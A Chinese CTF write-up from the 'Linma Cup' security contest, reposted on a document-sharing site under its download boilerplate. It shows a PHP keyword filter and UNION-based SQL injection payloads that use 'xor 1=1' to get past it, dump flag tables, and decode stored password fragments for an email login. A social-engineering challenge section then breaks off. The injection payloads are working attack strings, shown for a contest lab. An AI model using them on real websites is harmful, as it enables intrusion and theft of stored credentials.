- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
凌码杯信安大赛初赛透相关题目解析
凌码杯信安大赛渗透相关题目解析
(由于是题目,所以和实际渗透过程可能存在脱轨,会显得略坑)
(方法不唯一,大牛们就不要藏着了,分享一下你们的方法吧)
(如存在描述或其他错误,欢迎反馈,谢谢了)
Sql注入题目
环境描述
Windows server2008 r2+php5+mysql5
题目的数据库用户拥有对sql_test,informtion_schema库的select权限!
题目描述
通过图片链接get传参,id=XXX,此为注入点,很容易发现!
通过分析课发现过滤了and关键字
下面是具体过滤代码(关键部分)
$id=strtolower($id);
$str=array(and,outfile,into);
//$id = mysql_real_escape_string($id);
$old_id=$id;
for($i=0;$i3;$i++)
{
$id=str_replace($str[$i], ,$id);
}
if($old_id!=$id)
{
$error=true;
echo br参数中含有非法字符,请不要尝试注入!br/;
$ip = GETENV(REMOTE_ADDR);
echo br/你的ip: .$ip. 已被记录!br/;
header(refresh:2;url=./index.php);
}
所以需要绕过,这里采用xor 1=1绕过
以下为相应测试(方法不唯一)
通过order by n返回判断字段为5
测试是否正确(通过xor 1=1)
:8088/online/problem/cs18/show.php?id=2 xor 1=1 union select 1,user(),database(),version(),5
已经返回数据了得到数据库sql_test
然后开始爆表
本来正常可以使用where字句定位具体表,个人测试会出错
下面附上语句
sql_test=unhex(0x73716c5)
//尝试利用(未找到不能利用原因,求指教)
show.php?id=1 xor 1=1 union select 1,2,SCHEMA_NAME,4,5 from information_schema.TABLES where TABLE_SCHEMA=73716c5只好查询所有表信息,通过ctrl+f查找
show.php?id=2 xor 1=1 union select 1,2,3,table_name,table_name from information_schema.tables
查列名
info表
Key1表
Key_save表
Sql_data表里没什么有用信息,这里略过
然后开始爆表里数据
爆key1
:8088/online/problem/cs18/show.php?id=2 xor 1=1 union select 1,2,key1,4,5 from sql_test.key1
这里就获得key1了!
爆key_save表
:8088/online/problem/cs18/show.php?id=2 xor 1=1 union select link_node,key_value1,key_value2,key_value3,link_node from sql_test.key_save
得到表中数据
爆info表
:8088/online/problem/cs18/show.php?id=2 xor 1=1 union select 1,2,info1,info2,5 from sql_
看到有邮箱,联系到之前的key_save表,
不难想到那是存储处理后的密码!
对之前数据进行处理
7e6a2afe551e067a75fafacf47a6d981 === ^
SnE%40t=== SnE@t===waiT
eW91===you
分别采用md5 urlencode hex base64处理
密码明文组合后为
SnE@t^waiT^you
邮箱为:nyber_snert@163.com
登录成功
在草稿箱找到key2
到此为止,sql注入题目解析完毕!
有问题请反馈。
社会工程学题目
1、描述
题目环境采用wordpress搭建,第一个任务就是找到后台登录密码!
整个web没有写权限,大家也不要尝试写马了!
思路就是寻找tips相关信息,获取密码
这个key就不详说了,看到密码就明白了!
Key1:xiaolin_a564789324
然后登录后台,发现插件信息
此插件有一漏洞,key.txt就藏在该
文档评论(0)